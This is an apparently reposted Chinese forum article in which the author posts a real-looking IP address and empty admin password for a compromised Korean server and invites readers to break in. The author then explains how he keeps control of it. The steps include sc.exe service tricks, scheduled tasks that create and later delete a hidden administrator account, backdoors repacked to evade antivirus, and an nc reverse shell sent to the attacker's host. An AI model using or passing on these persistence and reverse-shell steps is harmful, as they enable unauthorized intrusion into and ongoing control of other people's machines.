萬盛學電腦網

 萬盛學電腦網 >> 應用技巧 >> 你能拿到這台機的一個文件嗎

你能拿到這台機的一個文件嗎

首先申明,我很菜的,絕對是一個菜鳥。今天忽然很有興趣想跟我一樣菜的菜鳥來玩這個游戲。當做一個小測試吧。所以如果你是高手的話就不用往下看了。

今天花了點時間對台肉機作了點小小的安全配置。
韓國機。沒做IP策略。沒做端口過濾。端口開放:21,25,80,135,139,445,3306,3389
211.42.93.200
administrator 密碼為空。(絕對是管理員帳號)

任務是:拿到c:\winnt\system.txt,讀出裡面的內容。
說明:至少有3種以上的方法可進入主機


答案是用sc.exe

SORRY,由於我的疏忽(我只檢查了2次),造成無法IPC連接。因為是
弱口令,所以之前已經有同行進入肉機並且做了個bat文件來刪除IPC$
.而我也只是斷了他留下了的後門(當時並沒有發現這個BAT文件,真
失敗),所以後來我看到有人說無法IPC連接,我才上去net share ipc$

這個“小游戲”是我又看了沉睡不醒的<<構建一只安全的肉雞>>一時興
起做的,目的是想看大家的思路,下面是我的具體做法和對<<構建一只安全的肉雞>>
的一點補充:
1,查看補丁情況
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix
發現已打了SP3補丁,省事,倒也省了我不少工夫。
2,修改注冊表,禁止空連接,刪除admin$,C$,D$等等。
關掉Admin$ 
服務器: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 
AutoShareServer = DWORD:00000000 
工作站: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters 
AutoShareWks = DWORD:00000000 
禁止空會話: 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 
RestrictAnonymous = DWORD:00000001 
或者“控制面板”-“本地(域)安全策略”-“安全選項”裡...... 
立刻從新啟動lanmanserver服務,使其生效。
注意:現在並沒有刪除IPC$連接。
3,看一下有沒有可疑帳號,如肉機是server以下版本,用CCA.EXE查看
是否有克隆帳號,如是AD-server就看一下管理員有沒有可疑帳號,有就
刪除它吧。
4,我在肉機上裝了RADMIN,winshell(脫殼並加殼,目的是防止被殺毒
軟件殺掉),WinEggDrop Shell。為了防止其他人進入肉機,用WinEggDrop Shell
的fport功能,打開“服務”窗口看一下沒有可疑服務,進程,有的話就停服務
殺進程(pskill),刪除相關的程序。
5,雖然有開80端口,但只是默認裝了IIS,肉機本身並沒有什麼網站,而且
而且也裝了SP3,不會有什麼漏洞。更詳細的資料請看<<構建一只安全的肉雞>>
6,服務”-“snmp service”-“屬性頁”-“安全”那個“接受團體名稱”也就是
“public”,它就是snmp訪問口令。把它改成一個安全的口令。小心!一些暴力破解。
這個漏洞,危害雖然沒有那麼直接,但還是有的,暴露系統的類型和具體的版本,
獲取帳號列表,運行服務信息.....。 
7,開了3306端口,用的mysql,沒有什麼漏洞。如是MSSQL,就要小心了,
看看補丁情況,沒補的話就補上吧。
8,雖然現在除了IPC$,沒有什麼C盤D盤的共享了,但已防萬一,把at.exe
改一下名。禁用並停止WMI服務,禁用並停止再刪除telnet服務(從
注冊表中刪除)
9,停止遠程注冊表服務(Remote Registry Service),這個也很危險喔)
10,雖然administrator是管理員帳號,但是我禁止了它登陸終端服務器)。

好了,現在用終端連接服務器,opentelnet RTCS.vbe,psexec也連不上了。
因為psexec默認用的c:\winnt\system32\cmd.exe,但刪除C$,所以使用
psexec顯示拒絕訪問。我試過建個共享文件夾,copy個cmd.exe到這個文件
共享文件夾,然後再用psexec也不行。那現在只能用的是ipc$,也到了SC.EXE
出場了,一個常被人忘記的程序。我們只是禁用並停止了WMI服務,但
我們仍然可以用打開WMI服務,而不用理會這個服務是否禁用,是否需要
手動開啟。而且就算這個服務被刪除了,我們也可以重新創建它。
sc \\ip config WinMgmt start= auto
看到命令成功的提示了嗎?那現在就可以用eva的那個RTCS.vbe來telnet了,
同樣,可以利用還有telnet服務。

如果你用終端連接服務器登陸的話會發現administrator沒有登陸會話權,
其實只是“計算機管理”-帳號-“屬性”-“禁止登陸終端服務器”而已。
用sc開啟遠程注冊表服務,然後“連接網絡注冊表”修改注冊表使其重新
啟動後可以登陸。

其實我們大可做ipsec來過濾掉135,135,445端口,但這樣做改動太大,怕管理員
發現,而且肉機如果是日文,韓文,那怎麼辦?如果我們做了個BAT文件來刪除
IPC$,並且每次隨肉機啟動而運行。這個連sc.exe也沒用了。我們還有
下面的做法,利用計劃任務,這個方法是星雲大哥以前提過的
1).在晚上10點運行這個3個命令
net share ipc$
net user user password /add
net localgroup administrators user /add
2).在早上6點運行這個3個命令
net share ipc$ /del
net localgroup administrators user /del
net user user /del
用命令行來做吧,夠隱蔽
其實我們還可以加個 nc 你的本機IP 54 >> nc -e cmd.exe上去上面的程序行,
(當然這個nc.exe是傳上去的,不過小心被殺掉,一般殺素軟件都認為nc.exe是病毒)
然後在本機用nc -l -p 54
這時nc就會反向發一個shell給你,防火牆就會為你轉發數據。

數一數,裝了5個後門
1,Radmin
2,WinEggDrop Shell
3,winshell
4,計劃任務來建用戶,也算後門吧
5,nc.exe開反向連接後門

本文寫得很亂,也沒有一點技術的細節,因為我太菜,上面只是我的一點體會
讓我們一起進步吧。。。
copyright © 萬盛學電腦網 all rights reserved